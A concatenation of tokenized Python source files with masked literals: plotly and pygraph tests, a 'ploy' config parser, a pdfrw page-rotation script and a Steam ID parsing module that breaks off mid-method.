<s> from unittest import TestCase <EOL> import plotly . graph_objs as go <EOL> import plotly . graph_reference as gr <EOL> OLD_CLASS_NAMES = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class TestBackwardsCompat ( TestCase ) : <EOL> def test_old_class_names ( self ) : <EOL> for class_name in OLD_CLASS_NAMES : <EOL> self . assertIn ( class_name , go . __dict__ . keys ( ) ) <EOL> class TestGraphObjs ( TestCase ) : <EOL> def test_traces_should_be_defined ( self ) : <EOL> class_names = [ gr . string_to_class_name ( object_name ) <EOL> for object_name in gr . TRACE_NAMES ] <EOL> for class_name in class_names : <EOL> self . assertIn ( class_name , go . __dict__ . keys ( ) ) <EOL> def test_no_new_classes ( self ) : <EOL> expected_class_names = { gr . string_to_class_name ( object_name ) <EOL> for object_name in gr . TRACE_NAMES } <EOL> expected_class_names . update ( OLD_CLASS_NAMES ) <EOL> current_class_names = { key for key in go . __dict__ . keys ( ) <EOL> if key [ <NUM_LIT:0> ] . isupper ( ) } <EOL> self . assertEqual ( current_class_names , expected_class_names ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> from unittest import TestCase <EOL> from plotly . widgets import GraphWidget <EOL> class TestWidgets ( TestCase ) : <EOL> def test_instantiate_graph_widget ( self ) : <EOL> widget = GraphWidget </s>
<s> from ploy . common import Hooks <EOL> try : <EOL> from configparser import RawConfigParser <EOL> except ImportError : <EOL> from ConfigParser import RawConfigParser <EOL> try : <EOL> from collections import MutableMapping as DictMixin <EOL> except ImportError : <EOL> from UserDict import DictMixin <EOL> from weakref import proxy <EOL> import inspect <EOL> import logging <EOL> import os <EOL> import sys <EOL> import warnings <EOL> log = logging . getLogger ( '<STR_LIT>' ) <EOL> try : <EOL> unicode <EOL> except NameError : <EOL> unicode = str <EOL> _marker = object ( ) <EOL> def value_asbool ( value ) : <EOL> if isinstance ( value , bool ) : <EOL> return value <EOL> if value . lower ( ) in ( '<STR_LIT:true>' , '<STR_LIT:yes>' , '<STR_LIT>' ) : <EOL> return True <EOL> elif value . lower ( ) in ( '<STR_LIT:false>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> return False <EOL> class BaseMassager ( object ) : <EOL> def __init__ ( self , sectiongroupname , key ) : <EOL> self . sectiongroupname = sectiongroupname <EOL> self . key = key <EOL> def path ( self , config , sectionname ) : <EOL> return config . get_path ( self . key ) <EOL> def __call__ ( self , config , sectionname ) : <EOL> value = config . _dict [ self . key ] <EOL> if isinstance ( value , ConfigValue ) : <EOL> return value . value <EOL> return value <EOL> class BooleanMassager ( BaseMassager ) : <EOL> def __call__ ( self , config , sectionname ) : <EOL> value = BaseMassager . __call__ ( self , config , sectionname ) <EOL> value = value_asbool ( value ) <EOL> if value is None : <EOL> raise ValueError ( "<STR_LIT>" % ( value , self . key , self . sectiongroupname , sectionname ) ) <EOL> return value <EOL> class IntegerMassager ( BaseMassager ) : <EOL> def __call__ ( self , config , sectionname ) : <EOL> value = BaseMassager . __call__ ( self , config , sectionname ) <EOL> return int ( value ) <EOL> def expand_path ( value , base ) : <EOL> value = os . path . expanduser ( value ) <EOL> if not os . path . 
isabs ( value ) : <EOL> value = os . path . join ( base , value ) <EOL> return os . path . normpath ( value ) <EOL> class PathMassager ( BaseMassager ) : <EOL> def __call__ ( self , config , sectionname ) : <EOL> value = BaseMassager . __call__ ( self , config , sectionname ) <EOL> return expand_path ( value , self . path ( config , sectionname ) ) <EOL> def resolve_dotted_name ( value ) : <EOL> if '<STR_LIT:.>' in value : <EOL> prefix , name = value . rsplit ( '<STR_LIT:.>' , <NUM_LIT:1> ) <EOL> _temp = __import__ ( prefix , globals ( ) , locals ( ) , [ name ] ) <EOL> return getattr ( _temp , name ) <EOL> else : <EOL> return __import__ ( value , globals ( ) , locals ( ) , [ ] ) <EOL> class HooksMassager ( BaseMassager ) : <EOL> def __call__ ( self , config , sectionname ) : <EOL> value = BaseMassager . __call__ ( self , config , sectionname ) <EOL> hooks = Hooks ( ) <EOL> for hook_spec in value . split ( ) : <EOL> hooks . add ( resolve_dotted_name ( hook_spec ) ( ) ) <EOL> return hooks <EOL> class StartupScriptMassager ( BaseMassager ) : <EOL> def __call__ ( self , config , sectionname ) : <EOL> value = BaseMassager . __call__ ( self , config , sectionname ) <EOL> if not value : <EOL> return <EOL> result = dict ( ) <EOL> if value . startswith ( '<STR_LIT>' ) : <EOL> value = value [ <NUM_LIT:5> : ] <EOL> result [ '<STR_LIT>' ] = True <EOL> if not os . path . isabs ( value ) : <EOL> value = os . path . join ( self . path ( config , sectionname ) , value ) <EOL> result [ '<STR_LIT:path>' ] = value <EOL> return result <EOL> class UserMassager ( BaseMassager ) : <EOL> def __call__ ( self , config , sectionname ) : <EOL> value = BaseMassager . __call__ ( self , config , sectionname ) <EOL> if value == "<STR_LIT:*>" : <EOL> import pwd <EOL> value = pwd . getpwuid ( os . 
getuid ( ) ) [ <NUM_LIT:0> ] <EOL> return value <EOL> class ConfigValue ( object ) : <EOL> __slots__ = ( '<STR_LIT:path>' , '<STR_LIT:value>' , '<STR_LIT:src>' ) <EOL> def __init__ ( self , path , value , src = None ) : <EOL> self . path = path <EOL> self . value = value <EOL> self . src = src <EOL> def get_package_name ( module ) : <EOL> f = getattr ( module , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if ( ( '<STR_LIT>' in f ) or ( '<STR_LIT>' in f ) ) : <EOL> return module . __name__ <EOL> else : <EOL> return module . __name__ . rsplit ( '<STR_LIT:.>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> def get_caller_src ( ) : <EOL> skip = frozenset ( [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> stop = frozenset ( [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> frame = sys . _getframe ( <NUM_LIT:2> ) <EOL> while frame . f_back is not None : <EOL> f_code = frame . f_code <EOL> lineno = frame . f_lineno <EOL> module_globals = frame . f_globals <EOL> frame = frame . f_back <EOL> module_name = module_globals . get ( '<STR_LIT>' ) or '<STR_LIT:__main__>' <EOL> if ( module_name , f_code . co_name ) in skip : <EOL> continue <EOL> if ( module_name , f_code . co_name ) in stop : <EOL> return <EOL> package_name = get_package_name ( sys . modules [ module_name ] ) <EOL> f = getattr ( sys . modules [ package_name ] , '<STR_LIT>' , '<STR_LIT>' ) <EOL> path = os . path . relpath ( f_code . co_filename , os . path . dirname ( f ) ) <EOL> return "<STR_LIT>" % ( package_name , path , lineno ) <EOL> sys . exit ( <NUM_LIT:0> ) <EOL> class ConfigSection ( DictMixin ) : <EOL> def __init__ ( self , * args , ** kw ) : <EOL> self . _dict = { } <EOL> for k , v in dict ( * args , ** kw ) . items ( ) : <EOL> self [ k ] = v <EOL> self . sectionname = None <EOL> self . sectiongroupname = None <EOL> self . _config = None <EOL> self . 
massagers = { } <EOL> def add_massager ( self , massager ) : <EOL> key = ( massager . sectiongroupname , massager . key ) <EOL> existing = self . massagers . get ( key ) <EOL> if existing is not None : <EOL> equal_class = massager . __class__ == existing . __class__ <EOL> equal_vars = vars ( massager ) == vars ( existing ) <EOL> if equal_class and equal_vars : <EOL> return <EOL> raise ValueError ( "<STR_LIT>" % ( massager . key , massager . sectiongroupname ) ) <EOL> self . massagers [ key ] = massager <EOL> def __delitem__ ( self , key ) : <EOL> del self . _dict [ key ] <EOL> def get_path ( self , key , default = _marker ) : <EOL> if default is not _marker : <EOL> if key not in self . _dict : <EOL> return default <EOL> return self . _dict [ key ] . path <EOL> def __getitem__ ( self , key ) : <EOL> if key == '<STR_LIT>' : <EOL> return self . sectiongroupname <EOL> if key == '<STR_LIT>' : <EOL> return self . sectionname <EOL> if key in self . _dict : <EOL> if self . _config is not None : <EOL> massage = self . _config . massagers . get ( ( self . sectiongroupname , key ) ) <EOL> if not callable ( massage ) : <EOL> massage = self . _config . massagers . get ( ( None , key ) ) <EOL> if callable ( massage ) : <EOL> if len ( inspect . getargspec ( massage . __call__ ) . args ) == <NUM_LIT:3> : <EOL> return massage ( self , self . sectionname ) <EOL> else : <EOL> return massage ( self , self . sectiongroupname , self . sectionname ) <EOL> else : <EOL> return massage ( self , self . sectionname ) <EOL> massage = self . massagers . get ( ( self . sectiongroupname , key ) ) <EOL> if callable ( massage ) : <EOL> return massage ( self , self . sectionname ) <EOL> value = self . _dict [ key ] <EOL> if isinstance ( value , ConfigValue ) : <EOL> return value . 
value <EOL> return value <EOL> def __setitem__ ( self , key , value ) : <EOL> if not isinstance ( value , ConfigValue ) : <EOL> src = None <EOL> if not isinstance ( value , ConfigSection ) : <EOL> src = get_caller_src ( ) <EOL> value = ConfigValue ( None , value , src = src ) <EOL> self . _dict [ key ] = value <EOL> def keys ( self ) : <EOL> return self . _dict . keys ( ) <EOL> def __len__ ( self ) : <EOL> return len ( self . _dict ) <EOL> def __iter__ ( self ) : <EOL> return iter ( self . keys ( ) ) <EOL> def copy ( self ) : <EOL> new = ConfigSection ( ) <EOL> new . _dict = self . _dict . copy ( ) <EOL> new . sectionname = self . sectionname <EOL> new . sectiongroupname = self . sectiongroupname <EOL> new . massagers = self . massagers . copy ( ) <EOL> new . _config = self . _config <EOL> return new <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( self . __class__ . __name__ , dict ( self ) ) <EOL> class Config ( ConfigSection ) : <EOL> def _expand ( self , sectiongroupname , sectionname , section , seen ) : <EOL> if ( sectiongroupname , sectionname ) in seen : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> seen . add ( ( sectiongroupname , sectionname ) ) <EOL> macronames = section [ '<STR_LIT:<>' ] . split ( ) <EOL> for macroname in macronames : <EOL> if '<STR_LIT::>' in macroname : <EOL> macrogroupname , macroname = macroname . split ( '<STR_LIT::>' ) <EOL> else : <EOL> macrogroupname = sectiongroupname <EOL> macro = self [ macrogroupname ] [ macroname ] <EOL> if '<STR_LIT:<>' in macro : <EOL> self . _expand ( macrogroupname , macroname , macro , seen ) <EOL> if sectiongroupname in self . macro_cleaners : <EOL> macro = macro . copy ( ) <EOL> self . macro_cleaners [ sectiongroupname ] ( macro ) <EOL> for key in macro : <EOL> if key not in section : <EOL> section . _dict [ key ] = macro . _dict [ key ] <EOL> del section [ '<STR_LIT:<>' ] <EOL> def __init__ ( self , config , path = None , bbb_config = False , plugins = None ) : <EOL> ConfigSection . 
__init__ ( self ) <EOL> self . config = config <EOL> if path is None : <EOL> if getattr ( config , '<STR_LIT>' , None ) is None : <EOL> path = os . path . dirname ( config ) <EOL> self . path = path <EOL> self . macro_cleaners = { } <EOL> if plugins is not None : <EOL> for plugin in plugins . values ( ) : <EOL> for massager in plugin . get ( '<STR_LIT>' , lambda : [ ] ) ( ) : <EOL> self . add_massager ( massager ) <EOL> if '<STR_LIT>' in plugin : <EOL> self . macro_cleaners . update ( plugin [ '<STR_LIT>' ] ( self ) ) <EOL> def read_config ( self , config ) : <EOL> result = [ ] <EOL> stack = [ config ] <EOL> while <NUM_LIT:1> : <EOL> config = stack . pop ( ) <EOL> src = None <EOL> if isinstance ( config , ( str , unicode ) ) : <EOL> src = os . path . relpath ( config ) <EOL> _config = RawConfigParser ( ) <EOL> _config . optionxform = lambda s : s <EOL> if getattr ( config , '<STR_LIT>' , None ) is not None : <EOL> _config . readfp ( config ) <EOL> path = self . path <EOL> else : <EOL> if not os . path . exists ( config ) : <EOL> log . error ( "<STR_LIT>" , config ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> _config . read ( config ) <EOL> path = os . path . dirname ( config ) <EOL> for section in reversed ( _config . sections ( ) ) : <EOL> for key , value in reversed ( _config . items ( section ) ) : <EOL> result . append ( ( src , path , section , key , value ) ) <EOL> result . append ( ( src , path , section , None , None ) ) <EOL> if _config . has_option ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> extends = _config . get ( '<STR_LIT>' , '<STR_LIT>' ) . split ( ) <EOL> elif _config . has_option ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> extends = _config . get ( '<STR_LIT>' , '<STR_LIT>' ) . split ( ) <EOL> else : <EOL> break <EOL> stack [ <NUM_LIT:0> : <NUM_LIT:0> ] = [ <EOL> os . path . abspath ( os . path . 
join ( path , x ) ) <EOL> for x in reversed ( extends ) ] <EOL> return reversed ( result ) <EOL> def get_section ( self , sectiongroupname , sectionname ) : <EOL> sectiongroup = self [ sectiongroupname ] <EOL> if sectionname not in sectiongroup : <EOL> section = ConfigSection ( ) <EOL> section . sectiongroupname = sectiongroupname <EOL> section . sectionname = sectionname <EOL> section . _config = proxy ( self ) <EOL> sectiongroup [ sectionname ] = section <EOL> return sectiongroup [ sectionname ] <EOL> def parse ( self ) : <EOL> _config = self . read_config ( self . config ) <EOL> for src , path , configsection , key , value in _config : <EOL> if '<STR_LIT::>' in configsection : <EOL> sectiongroupname , sectionname = configsection . split ( '<STR_LIT::>' ) <EOL> else : <EOL> sectiongroupname , sectionname = '<STR_LIT>' , configsection <EOL> if sectiongroupname == '<STR_LIT>' and sectionname == '<STR_LIT>' and key == '<STR_LIT>' : <EOL> continue <EOL> sectiongroup = self . setdefault ( sectiongroupname , ConfigSection ( ) ) <EOL> self . get_section ( sectiongroupname , sectionname ) <EOL> if key is not None : <EOL> if key == '<STR_LIT>' : <EOL> for spec in value . splitlines ( ) : <EOL> spec = spec . strip ( ) <EOL> if not spec : <EOL> continue <EOL> if '<STR_LIT:=>' not in spec : <EOL> log . error ( "<STR_LIT>" , spec , sectiongroupname , sectionname ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> massager_key , massager = spec . split ( '<STR_LIT:=>' ) <EOL> massager_key = massager_key . strip ( ) <EOL> massager = massager . strip ( ) <EOL> if '<STR_LIT::>' in massager_key : <EOL> parts = tuple ( x . strip ( ) for x in massager_key . split ( '<STR_LIT::>' ) ) <EOL> if len ( parts ) == <NUM_LIT:2> : <EOL> massager_sectiongroupname , massager_key = parts <EOL> massager_sectionname = None <EOL> elif len ( parts ) == <NUM_LIT:3> : <EOL> massager_sectiongroupname , massager_sectionname , massager_key = parts <EOL> else : <EOL> log . 
error ( "<STR_LIT>" , spec , sectiongroupname , sectionname ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> if massager_sectiongroupname == '<STR_LIT>' : <EOL> massager_sectiongroupname = sectiongroupname <EOL> if massager_sectiongroupname == '<STR_LIT:*>' : <EOL> massager_sectiongroupname = None <EOL> if massager_sectionname == '<STR_LIT>' : <EOL> massager_sectionname = sectionname <EOL> else : <EOL> massager_sectiongroupname = sectiongroupname <EOL> massager_sectionname = sectionname <EOL> try : <EOL> massager = resolve_dotted_name ( massager ) <EOL> except ImportError as e : <EOL> log . error ( "<STR_LIT>" , massager , unicode ( e ) ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> except AttributeError as e : <EOL> log . error ( "<STR_LIT>" , massager , unicode ( e ) ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> massager = massager ( massager_sectiongroupname , massager_key ) <EOL> if massager_sectionname is None : <EOL> self . add_massager ( massager ) <EOL> else : <EOL> massager_section = self . get_section ( <EOL> sectiongroupname , massager_sectionname ) <EOL> massager_section . add_massager ( massager ) <EOL> else : <EOL> sectiongroup [ sectionname ] [ key ] = ConfigValue ( path , value , src = src ) <EOL> if '<STR_LIT>' in self : <EOL> warnings . warn ( "<STR_LIT>" ) <EOL> del self [ '<STR_LIT>' ] <EOL> seen = set ( ) <EOL> for sectiongroupname in self : <EOL> sectiongroup = self [ sectiongroupname ] <EOL> for sectionname in sectiongroup : <EOL> section = sectiongroup [ sectionname ] <EOL> if '<STR_LIT:<>' in section : <EOL> self . _expand ( sectiongroupname , sectionname , section , seen ) <EOL> return self <EOL> def get_section_with_overrides ( self , sectiongroupname , sectionname , overrides ) : <EOL> config = self [ sectiongroupname ] [ sectionname ] . copy ( ) <EOL> if overrides is not None : <EOL> config . _dict . update ( overrides ) <EOL> return config </s>
<s> from setuptools import setup <EOL> install_requires = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> packages = [ '<STR_LIT>' ] , <EOL> version = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> install_requires = install_requires , <EOL> test_suite = '<STR_LIT>' , <EOL> tests_require = [ '<STR_LIT>' ] , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] ) </s>
<s> """<STR_LIT>""" <EOL> def traversal ( graph , node , order ) : <EOL> """<STR_LIT>""" <EOL> visited = { } <EOL> if ( order == '<STR_LIT>' ) : <EOL> pre = <NUM_LIT:1> <EOL> post = <NUM_LIT:0> <EOL> elif ( order == '<STR_LIT>' ) : <EOL> pre = <NUM_LIT:0> <EOL> post = <NUM_LIT:1> <EOL> for each in _dfs ( graph , visited , node , pre , post ) : <EOL> yield each <EOL> def _dfs ( graph , visited , node , pre , post ) : <EOL> """<STR_LIT>""" <EOL> visited [ node ] = <NUM_LIT:1> <EOL> if ( pre ) : yield node <EOL> for each in graph [ node ] : <EOL> if ( each not in visited ) : <EOL> for other in _dfs ( graph , visited , each , pre , post ) : <EOL> yield other <EOL> if ( post ) : yield node </s>
<s> """<STR_LIT>""" <EOL> import unittest <EOL> from pygraph . classes . digraph import digraph <EOL> from pygraph . algorithms . pagerank import pagerank <EOL> import testlib <EOL> class test_pagerank ( unittest . TestCase ) : <EOL> def test_pagerank_empty ( self ) : <EOL> G = digraph ( ) <EOL> self . assertEqual ( pagerank ( G ) , { } ) <EOL> def test_pagerank_cycle ( self ) : <EOL> G = digraph ( ) <EOL> G . add_nodes ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> ] ) <EOL> G . add_edge ( ( <NUM_LIT:1> , <NUM_LIT:2> ) ) <EOL> G . add_edge ( ( <NUM_LIT:2> , <NUM_LIT:3> ) ) <EOL> G . add_edge ( ( <NUM_LIT:3> , <NUM_LIT:4> ) ) <EOL> G . add_edge ( ( <NUM_LIT:4> , <NUM_LIT:5> ) ) <EOL> G . add_edge ( ( <NUM_LIT:5> , <NUM_LIT:1> ) ) <EOL> self . assertEqual ( pagerank ( G ) , { <NUM_LIT:1> : <NUM_LIT> , <NUM_LIT:2> : <NUM_LIT> , <NUM_LIT:3> : <NUM_LIT> , <NUM_LIT:4> : <NUM_LIT> , <NUM_LIT:5> : <NUM_LIT> } ) <EOL> def test_pagerank ( self ) : <EOL> G = digraph ( ) <EOL> G . add_nodes ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> ] ) <EOL> G . add_edge ( ( <NUM_LIT:1> , <NUM_LIT:2> ) ) <EOL> G . add_edge ( ( <NUM_LIT:1> , <NUM_LIT:3> ) ) <EOL> G . add_edge ( ( <NUM_LIT:1> , <NUM_LIT:4> ) ) <EOL> G . add_edge ( ( <NUM_LIT:1> , <NUM_LIT:5> ) ) <EOL> G . add_edge ( ( <NUM_LIT:1> , <NUM_LIT:7> ) ) <EOL> G . add_edge ( ( <NUM_LIT:2> , <NUM_LIT:1> ) ) <EOL> G . add_edge ( ( <NUM_LIT:3> , <NUM_LIT:1> ) ) <EOL> G . add_edge ( ( <NUM_LIT:3> , <NUM_LIT:2> ) ) <EOL> G . add_edge ( ( <NUM_LIT:4> , <NUM_LIT:2> ) ) <EOL> G . add_edge ( ( <NUM_LIT:4> , <NUM_LIT:3> ) ) <EOL> G . add_edge ( ( <NUM_LIT:4> , <NUM_LIT:5> ) ) <EOL> G . add_edge ( ( <NUM_LIT:5> , <NUM_LIT:1> ) ) <EOL> G . add_edge ( ( <NUM_LIT:5> , <NUM_LIT:3> ) ) <EOL> G . add_edge ( ( <NUM_LIT:5> , <NUM_LIT:4> ) ) <EOL> G . add_edge ( ( <NUM_LIT:5> , <NUM_LIT:6> ) ) <EOL> G . add_edge ( ( <NUM_LIT:6> , <NUM_LIT:1> ) ) <EOL> G . 
add_edge ( ( <NUM_LIT:6> , <NUM_LIT:5> ) ) <EOL> G . add_edge ( ( <NUM_LIT:7> , <NUM_LIT:5> ) ) <EOL> expected_pagerank = { <EOL> <NUM_LIT:1> : <NUM_LIT> , <EOL> <NUM_LIT:2> : <NUM_LIT> , <EOL> <NUM_LIT:3> : <NUM_LIT> , <EOL> <NUM_LIT:4> : <NUM_LIT> , <EOL> <NUM_LIT:5> : <NUM_LIT> , <EOL> <NUM_LIT:6> : <NUM_LIT> , <EOL> <NUM_LIT:7> : <NUM_LIT> , <EOL> } <EOL> pr = pagerank ( G ) <EOL> for k in pr : <EOL> self . assertAlmostEqual ( pr [ k ] , expected_pagerank [ k ] , places = <NUM_LIT:3> ) <EOL> def test_pagerank_random ( self ) : <EOL> G = testlib . new_digraph ( ) <EOL> md = <NUM_LIT> <EOL> df = <NUM_LIT> <EOL> pr = pagerank ( G , damping_factor = df , min_delta = md ) <EOL> min_value = ( <NUM_LIT:1.0> - df ) / len ( G ) <EOL> for node in G : <EOL> expected = min_value <EOL> for each in G . incidents ( node ) : <EOL> expected += ( df * pr [ each ] / len ( G . neighbors ( each ) ) ) <EOL> assert abs ( pr [ node ] - expected ) < md <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> '''<STR_LIT>''' <EOL> import sys <EOL> import os <EOL> from pdfrw import PdfReader , PdfWriter <EOL> inpfn = sys . argv [ <NUM_LIT:1> ] <EOL> rotate = sys . argv [ <NUM_LIT:2> ] <EOL> ranges = sys . argv [ <NUM_LIT:3> : ] <EOL> rotate = int ( rotate ) <EOL> assert rotate % <NUM_LIT> == <NUM_LIT:0> <EOL> ranges = [ [ int ( y ) for y in x . split ( '<STR_LIT:->' ) ] for x in ranges ] <EOL> outfn = '<STR_LIT>' % os . path . basename ( inpfn ) <EOL> trailer = PdfReader ( inpfn ) <EOL> pages = trailer . pages <EOL> if not ranges : <EOL> ranges = [ [ <NUM_LIT:1> , len ( pages ) ] ] <EOL> for onerange in ranges : <EOL> onerange = ( onerange + onerange [ - <NUM_LIT:1> : ] ) [ : <NUM_LIT:2> ] <EOL> for pagenum in range ( onerange [ <NUM_LIT:0> ] - <NUM_LIT:1> , onerange [ <NUM_LIT:1> ] ) : <EOL> pages [ pagenum ] . Rotate = ( int ( pages [ pagenum ] . inheritable . Rotate or <EOL> <NUM_LIT:0> ) + rotate ) % <NUM_LIT> <EOL> outdata = PdfWriter ( ) <EOL> outdata . trailer = trailer <EOL> outdata . write ( outfn ) </s>
<s> import static_pdfs <EOL> from pdfrw import PdfReader <EOL> try : <EOL> import unittest2 as unittest <EOL> except ImportError : <EOL> import unittest <EOL> class TestPdfReaderInit ( unittest . TestCase ) : <EOL> def test_fname_binary_filelike ( self ) : <EOL> with open ( static_pdfs . pdffiles [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , '<STR_LIT:rb>' ) as pdf_file : <EOL> PdfReader ( pdf_file ) <EOL> def test_fdata_binary ( self ) : <EOL> with open ( static_pdfs . pdffiles [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , '<STR_LIT:rb>' ) as pdf_file : <EOL> pdf_bytes = pdf_file . read ( ) <EOL> PdfReader ( fdata = pdf_bytes ) <EOL> def main ( ) : <EOL> unittest . main ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> from . __about__ import * </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division <EOL> import re <EOL> STEAM_ACCOUNT_UNIVERSE = { <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:2> , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : <NUM_LIT:4> , <EOL> '<STR_LIT>' : <NUM_LIT:5> , <EOL> } <EOL> STEAM_ACCOUNT_TYPE = { <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:2> , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : <NUM_LIT:4> , <EOL> '<STR_LIT>' : <NUM_LIT:5> , <EOL> '<STR_LIT>' : <NUM_LIT:6> , <EOL> '<STR_LIT>' : <NUM_LIT:7> , <EOL> '<STR_LIT>' : <NUM_LIT:8> , <EOL> '<STR_LIT>' : <NUM_LIT:9> , <EOL> '<STR_LIT>' : <NUM_LIT:10> , <EOL> } <EOL> class SteamId ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , steam_id , id_type = STEAM_ACCOUNT_TYPE [ '<STR_LIT>' ] ) : <EOL> """<STR_LIT>""" <EOL> self . is_bot = False <EOL> self . is_console = False <EOL> if isinstance ( steam_id , int ) : <EOL> ( self . id_number , <EOL> self . y_part , <EOL> self . instance , <EOL> self . id_type , <EOL> self . universe ) = self . split_id64 ( steam_id ) <EOL> elif not isinstance ( steam_id , str ) and not isinstance ( steam_id , unicode ) : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> else : <EOL> if unicode ( steam_id ) == u'<STR_LIT>' : <EOL> self . is_bot = True <EOL> elif unicode ( steam_id ) == u'<STR_LIT>' : <EOL> self . is_console == True <EOL> else : <EOL> pattern = '<STR_LIT>' . join ( [ <EOL> ur '<STR_LIT>' , <EOL> ur '<STR_LIT>' , <EOL> ] ) <EOL> match = re . match ( pattern , steam_id , re . I | re . U ) <EOL> if not match : <EOL> raise ValueError ( '<STR_LIT>' % steam_id ) <EOL> self . universe = int ( match . groupdict ( ) [ '<STR_LIT>' ] ) <EOL> self . instance = <NUM_LIT:1> <EOL> self . y_part = int ( match . groupdict ( ) [ '<STR_LIT>' ] ) <EOL> self . id_number = int ( match . groupdict ( ) [ '<STR_LIT>' ] ) <EOL> self . 
id_type = id_type <EOL> def __str__ ( self ) : <EOL> return unicode ( self ) . encode ( '<STR_LIT:utf-8>' ) <EOL> def __unicode__ ( self ) : <EOL> if self . is_bot : <EOL> return u'<STR_LIT>' <EOL> elif self . is_console : <EOL> return u'<STR_LIT>' <EOL> else : <EOL> return self . id64_to_str ( self . id64 ( ) ) <EOL> def id64 ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . is_bot or self . is_console : <EOL> return <NUM_LIT:0> <EOL> id64 = self . id_number * <NUM_LIT:2> <EOL> id64 += self . y_part <EOL> id64 |= self . instance << <NUM_LIT:32> <EOL> id64 |= self . id_type << <NUM_LIT> <EOL> id64 |= self . universe << <NUM_LIT> <EOL> return id64 <EOL> @ classmethod <EOL> def id64_to_str ( cls , id64 , universe = STEAM_ACCOUNT_UNIVERSE [ '<STR_LIT>' ] ) : <EOL> """<STR_LIT>""" <EOL> ( id_number , y_part , instance , id_type , universe ) = SteamId . split_id64 ( id64 ) <EOL> return u'<STR_LIT>' % ( universe , y_part , id_number ) <EOL> @ classmethod <EOL> def split_id64 ( cls , id64 ) : <EOL> """<STR_LIT>""" <EOL> y_part = id64 % <NUM_LIT:2> <EOL> id_number = ( id64 & <NUM_LIT> - y_part ) // <NUM_LIT:2> <EOL> instance = ( id64 & <NUM_LIT> ) >> <NUM_LIT:32> <EOL> id_type = ( id64 & <NUM_LIT> ) >> <NUM_LIT> <EOL> universe = ( id64 & <NUM_LIT> ) >> <NUM_LIT> <EOL> return ( id_number , y_part , instance , id_type , universe ) <EOL> class BasePlayer ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name , uid , steam_id , team = u'<STR_LIT>' ) : <EOL> if not isinstance ( steam_id , SteamId ) : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> if isinstance ( name , str ) : <EOL> name = unicode ( name , '<STR_LIT:utf-8>' , '<STR_LIT:replace>' ) <EOL> self . name = name <EOL> if isinstance ( uid , str ) or isinstance ( uid , unicode ) : <EOL> uid = int ( uid ) <EOL> self . uid = uid <EOL> self . steam_id = steam_id <EOL> if team is None : <EOL> team = u'<STR_LIT>' <EOL> self . team = team <EOL> def __str__ ( self ) : <EOL> return unicode ( self ) . 
